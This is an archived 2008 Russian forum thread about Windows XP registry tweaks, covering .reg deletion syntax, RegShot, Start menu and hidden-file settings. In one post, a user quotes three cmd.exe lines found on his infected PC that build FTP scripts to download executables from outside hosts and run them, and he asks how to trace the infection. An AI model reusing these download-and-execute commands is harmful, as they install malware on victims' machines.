Ru-Board.club
← Вернуться в раздел «Microsoft Windows»

» Реестр Windows 2000 / Windows XP [3]

Автор: vu1tur
Дата сообщения: 06.03.2008 07:23
Предыдущие части: 1, 2.

Аналогичная тема по реестру Windows Vista Реестр Windows Vista (NT 6.0)

Отличная подборка материалов по реестру у KLASS'a
Bookmarks Версия 3.3.1 (17.12.07)
Самое полное описание на русском языке параметров и разделов реестра операционной системы Windows ХР. Предназначено для использования в программе Resplendent Registrar до версии 3.3 Подробности в файле readme.txt в архиве

Reg-файлы для русификации Групповой политики, Локальной политики безопасности и описаний служб в Windows XP SP2 EN
Также обратите внимание на содержащиеся в наших архивах материалы по реестру Windows:
Файловые архивы » Файловый архив форума "Операционные системы"
Bookmarks 3.1 в формате CHM
Bookmarks 3.1 в формате HTML


Для удаления раздела из реестра надо перед его именем в квадратных скобках поставить символ "-":

REGEDIT4
[-HKEY_LOCAL_MACHINE\Software\QuickSoft\QuickStart]

а удалить параметр можно так:

REGEDIT4
[HKEY_CURRENT_USER\Software]
"xxx"=-

751 useful XP files На сайте ссылки дохлые, но есть перечень файлов в архивах:
Scripts_1.zip (11.9 MB) Зеркало
Scripts_2.zip (452.9 KB) Зеркало



Если что-то не находится:

Всё очень просто выяснить с помощью замечательной программули RegShot https://sourceforge.net/projects/regshot. Без инсталляции. Делает копии реестра и системных файлов до и после изменений и сама ищет изменения и подает всё на тарелочке . Всего делов-то - в три клика !


Есть ещё утилита, которая сразу создает REG файлы: http://www.paraglidernc.com/plugins/RegShot.cab (41,6 Кб) (временно не работает , пользуйтесь зеркалом)

Утилита UNDOReg 1.46, windows freeware наоборот удаляет ключи реестра, анализируя файлы от RegShot: Файл (53 Кб)
Сайт разработчика: http://neutronstar.cjb.net

Замечательная программуля RegShot обрела второе дыхание в виде RegShot 2.0.1.70 unicode
Сразу создает .REG файлы UNDO для отмены изменений и REDO для учета изменений. При желании записывает тоже в виде .INF.
Скачать: http://rghost.ru/3007428
Автор: VovIK
Дата сообщения: 06.03.2008 13:59
буду первым тут ;-0
Автор: rPansa
Дата сообщения: 06.03.2008 14:11
VovIK
Занёс себя в реестр? Нет? Зря..))

CADastr
Цитата:
В процессах run32.dll и drwatson висят...
Что такое первое (run32.dll)? Может быть -- rundll32.exe ?

У меня так первое подозрение при глюках с System Restore ВСЕГДА -- вирусы, трояны..
Автор: kasa1963
Дата сообщения: 07.03.2008 10:40
Привет Всем!
С контекстного меню пропали команды Open и Run As.
Где в реестре находятся ветки(пункты), отвечающие за эти команды?
Если конкретнее, то пропадают после автоустановки программ созданных с помощью
Symantec AutoInstall.
Спасибо.
Автор: vetvetvet
Дата сообщения: 09.03.2008 11:29
скажите как в реестр заимпортировать запись из установочного файла, эквивалентную такому выражению (regsvr32 file.ax) а также потом его отрегистрировать (regsvr32 -u file.ax) ?

как такое действо оформить в inf файле?
Автор: SHANDLE
Дата сообщения: 09.03.2008 16:39
vetvetvet
Про inf здесь: http://oszone.net/3827
(Хотя у меня пока не получилось).

Аналог regsvr32 можно сделать записав непосредственно в реестр всю регистрационную информацию. regsvr32 -u удалить эту информацию.
Как узнать что и куда писать? regsvr32 применяется к COM объектам. Если они оформлены в виде dll, то у них есть пара экспортируемых функций DllRegisterServer и DllUnregisterServer
К этим функциям можно обратиться сделав rundll32 file.dll, DllRegisterServer
Эти функции записывают(удаляют) все что нужно. Для exe их нужно запусть с ключом /RegServer или /UnregServer. regsvr32, собственно, этим и занимается, сообщая дополнительно о итогах (успех/ошибка).

Выяснить изменения реестра до регистрации/после регистрации можно с помощью утилиты regshot, сделав снимки реестра и сравнив их.
http://www.czechcup.com/regshot/
Автор: PPLS
Дата сообщения: 11.03.2008 07:13
Есть ли у кого-нибудь электронные книги по реестру windows XP? Выложите, плизз...
Вот эта, например, Реестр Microsoft Windows XP. Справочник профессионала, ссылка уже не работает, может еще продвинутей есть...
Автор: Maza Faka
Дата сообщения: 11.03.2008 10:36
PPLS
Во первых здесь не варезник! А во вторых Google ещё не отменили.

P.S
Проверь личку.
Автор: ru1956
Дата сообщения: 15.03.2008 23:07
Привет всем!
У меня в окне "Сохранить как" обнаружилось полное отсуствие всех пунктов,
просто серый прямоугольник.
Как поправить, Хелп плиииз!
Автор: SHANDLE
Дата сообщения: 16.03.2008 01:23
ru1956
Если это окно женской бани, то не удивительно.
Сломалось сохранить как у конкретного приложения, или у всех сразу? И что имеется ввиду под пунктами?
Автор: ru1956
Дата сообщения: 16.03.2008 11:39
SHANDLE

Цитата:
Сломалось сохранить как у конкретного приложения, или у всех сразу?

Сломалось системное окно "Сохранить как".
Когда при скачивании с инета по правой кнопке жмешь "Сохранить как",
выскакивает окно, вот в нем слева просто серое поле, а должно быть:
"Рабочий стол", "Мои документы" и т.д.
Юмор оценил, прошу простить за отсутствие конкретики.
Благодарю за Regshot, желаю удачи!

Автор: smartiom
Дата сообщения: 19.03.2008 23:39
приветствую всех
... и хотел бы спросить знающих людей вот про что:

речь идёт о [Start] -- > [Programs]
после определённого периода времени в [Start] -- > [Programs] неактивные записи скрываются и поевляется запись-кнопка при нажатии которой можно увидеть всё содержание (в MS Office такое же поведение меню можно настраивать в [Tools]/[Customize...] -> [Options] -> "Always show full menus")

вопрос(ы) следующий(ие): можно ли как-то в реестре управлять этим поведением для [Start] -- > [Programs]? где и как это сделать, если вообще возможно такое?

заранее благодарен
Автор: igor_andreev
Дата сообщения: 20.03.2008 01:11
smartiom
В HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Если классическое меню - "StartMenuScrollPrograms" строковый YES или NO
Если в стиле XP - "Start_ScrollPrograms" дворд 1 или 0
Автор: vetvetvet
Дата сообщения: 20.03.2008 01:54
кто знает, как в реестр запихивается такая хрень, лазя по страницах инета, и после перезагрузки компа она пытается в инет прорваться.

в памяти появляется процесс cmd.exe с такой командной строчкой

---------------
cmd /c echo open 220.95.255.2 20 > i&echo user lol lol >> i &echo get f6.exe >> i &echo quit >> i &ftp -n -s:i &f6.exe
---------------
cmd /c echo open b6cbf.in 20 > i&echo user lol lol >> i &echo get z28.exe >> i &echo quit >> i &ftp -n -s:i &z28.exe
---------------
cmd /k echo open 92.112.26.147 26431 > o&echo user 1 1 >> o &echo get Tilecomfree.com >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &Tilecomfree.com
---------------

и проблема в том, что если оно запустится - то не видно уже откуда вызов прошел.

как его отловить, с какой htm страницы оно в реестр прописывает на автозагрузку?
Автор: smartiom
Дата сообщения: 20.03.2008 03:05
igor_andreev
большое спасибо, но работать не хочет ... ни YES ни NO ничего не меняют в поведении Start-меню (меню классическое)
Автор: Elroir
Дата сообщения: 20.03.2008 03:48
smartiom

Цитата:
вопрос(ы) следующий(ие): можно ли как-то в реестре управлять этим поведением для [Start] -- > [Programs]? где и как это сделать, если вообще возможно такое?


Показывать полное меню:

Код:
Windows Registry Editor Version 5.00

;Do not use personalized menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"IntelliMenus"=dword:00000000

Автор: wanderer176
Дата сообщения: 20.03.2008 04:32
smartiom
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
параметр DWORD IntelliMenus, значение 1 - использовать сокращенные меню, 0 - не использовать.


Добавлено:
пока играл в игрушку Elroir уже ответил.


Добавлено:
ru1956
удали раздел HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\comdlg32\PlacesBar
Автор: Sish
Дата сообщения: 20.03.2008 07:49
vetvetvet
Антивирем каким пользуешься? базы свежие?
Автор: vetvetvet
Дата сообщения: 20.03.2008 10:49
Sish

доктором вебом свежим.

но он может отловить только уже загруженные трояны, а такие командные строки не отлавливает.

руками бы отловить.
Автор: smartiom
Дата сообщения: 20.03.2008 11:33
Elroir
wanderer176
спасибо вам ... IntelliMenus - то что надо
Автор: Sish
Дата сообщения: 20.03.2008 13:52
vetvetvet

Цитата:
такие командные строки не отлавливает.

Вывод какой делаем?

Попробуй загрузится с бутявки LiveCD ипрогнать оттуда скан на вири.
Автор: ustass1
Дата сообщения: 20.03.2008 23:24
Просьба помочь, у меня в контекстном меню для устройств и папок две команды "Открыть" - одна, которая по умолчанию, открывает папки в отдельных окнах, хотя в системе указано открывать всё в одном. А при нажатии через правую кнопку мыши, можно открыть папку вторым "Открыть", и тогда папка открывается в том же окне...
Подозрение на то, что в реестре указана не та команда на открытие...
Раздел HKEY_CLASSES_ROOT\Folder
содеожит следующее:
@="Папка"
"EditFlags"=dword:000003d2
"TileInfo"="prop:Size"
"BrowserFlags"=dword:00000008

[HKEY_CLASSES_ROOT\Folder\DefaultIcon]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,\
65,00,6c,00,6c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00,33,00,00,00

[HKEY_CLASSES_ROOT\Folder\shell]
@="open"

[HKEY_CLASSES_ROOT\Folder\shell\explore]
"BrowserFlags"=dword:00000022
"ExplorerFlags"=dword:00000021

[HKEY_CLASSES_ROOT\Folder\shell\explore\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,65,00,2c,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74,00,2c,\
00,25,00,49,00,2c,00,25,00,4c,00,00,00

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec]
@="[ExploreFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\application]
@="Folders"

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\ifexec]
@="[]"

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\topic]
@="AppProperties"

[HKEY_CLASSES_ROOT\Folder\shell\open]
"BrowserFlags"=dword:00000010
"ExplorerFlags"=dword:00000012

[HKEY_CLASSES_ROOT\Folder\shell\open\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74,00,2c,00,25,00,49,00,2c,\
00,25,00,4c,00,00,00

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec]
@="[ViewFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\application]
@="Folders"

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\ifexec]
@="[]"

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\topic]
@="AppProperties"

[HKEY_CLASSES_ROOT\Folder\shell\Открыть]

[HKEY_CLASSES_ROOT\Folder\shell\Открыть\command]
@="C:\\WINDOWS\\explorer.exe \"%1\""

[HKEY_CLASSES_ROOT\Folder\shell\Открыть\ddeexec]
@="[ViewFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""

[HKEY_CLASSES_ROOT\Folder\shell\Открыть\ddeexec\application]
@="Folders"

[HKEY_CLASSES_ROOT\Folder\shell\Открыть\ddeexec\ifexec]
@="[]"

[HKEY_CLASSES_ROOT\Folder\shell\Открыть\ddeexec\topic]
@="AppProperties"

[HKEY_CLASSES_ROOT\Folder\shellex]

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers]

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers\{0D2E74C4-3C34-11d2-A27E-00C04FC30871}]
@=""

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers\{24F14F01-7B1C-11d1-838f-0000F80461CF}]
@=""

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers\{24F14F02-7B1C-11d1-838f-0000F80461CF}]
@=""

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers\{66742402-F9B9-11D1-A202-0000F81FEDEE}]
@=""

[HKEY_CLASSES_ROOT\Folder\shellex\ColumnHandlers\{7D4D6379-F301-4311-BEBA-E26EB0561882}]
@="NeroDigitalExt.NeroDigitalColumnHandler"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers]

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\BriefcaseMenu]
@="{85BBD920-42A0-1069-A2E4-08002B30309D}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\NOD32 Context Menu Shell Extension]
@="{B089FE88-FB52-11D3-BDF1-0050DA34150D}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\UnlockerShellExtension]
@="{DDE4BEEB-DDE6-48fd-8EB5-035C09923F83}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\WinRAR]
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"

[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\{EB4D3CFE-E2AA-4C6E-B2FE-2A749F95D208}]

[HKEY_CLASSES_ROOT\Folder\shellex\DragDropHandlers]

[HKEY_CLASSES_ROOT\Folder\shellex\DragDropHandlers\NBShellHook]
@="{EB4D3CFE-E2AA-4C6E-B2FE-2A749F95D208}"

[HKEY_CLASSES_ROOT\Folder\shellex\DragDropHandlers\WinRAR]
@="{B41DB860-8EE4-11D2-9906-E49FADC173CA}"

[HKEY_CLASSES_ROOT\Folder\shellex\DragDropHandlers\{BD472F60-27FA-11cf-B8B4-444553540000}]
@=""

[HKEY_CLASSES_ROOT\Folder\shellex\PropertySheetHandlers]

[HKEY_CLASSES_ROOT\Folder\shellex\PropertySheetHandlers\BriefcasePage]
@="{85BBD920-42A0-1069-A2E4-08002B30309D}"

Автор: Tub
Дата сообщения: 21.03.2008 14:05
Проблема...
Проводник-Сервис-Свойство папки-Вид-Не показывать скрытые файлы и папки
Отвечат за этот параметр
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
Не получается включить Показывать скрытые файлы и папки
Автор: Trancsend
Дата сообщения: 21.03.2008 14:50
Tub
Может этот?
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000001
или
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000001
"Hidden"=dword:00000002
Автор: igor_andreev
Дата сообщения: 21.03.2008 15:28
Tub

Код:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
Автор: Tub
Дата сообщения: 21.03.2008 22:10
Trancsend
igor_andreev
Второй параметр это скрывать защищенные системные файлы.
На вирусы машину проверил - нет их
Когда параметр 00000002 меняешь на 00000001 моментально меняет на прежний
Как отследить этот параметр в реальном времени, кто его меняет?
Автор: Elroir
Дата сообщения: 21.03.2008 22:43
Tub

Цитата:
Как отследить этот параметр в реальном времени, кто его меняет?

Воспользуйся утилитой RegMon
Автор: Trancsend
Дата сообщения: 21.03.2008 22:44
Tub
Ну, можно одним из regmon'ов. Самый популярный - от www.sysinternals.com.
Автор: igor_andreev
Дата сообщения: 21.03.2008 23:09

Цитата:
На вирусы машину проверил - нет их
Когда параметр 00000002 меняешь на 00000001 моментально меняет на прежний
Как отследить этот параметр в реальном времени, кто его меняет?

Другим антивирусом проверь. Или список процессов запости сюда, скрой под тегом MORE.
Автор: ustass1
Дата сообщения: 22.03.2008 22:20
Жаль, что никто не смог мне помочь...
На будующее, если у кого возникнет подобная проблема с открытием папок, необходимо в разделе shell параметром по умолчанию указать значение open. И тогда применяется политика, указанная в свойствах папки.
Только в подразделах не должно быть раздела open типа такого:
[HKEY_CLASSES_ROOT\Drive\shell\open\command]
@="C:\\WINDOWS\\explorer.exe \"%1\""

Страницы: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455

Предыдущая тема: Интернет тупит


Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.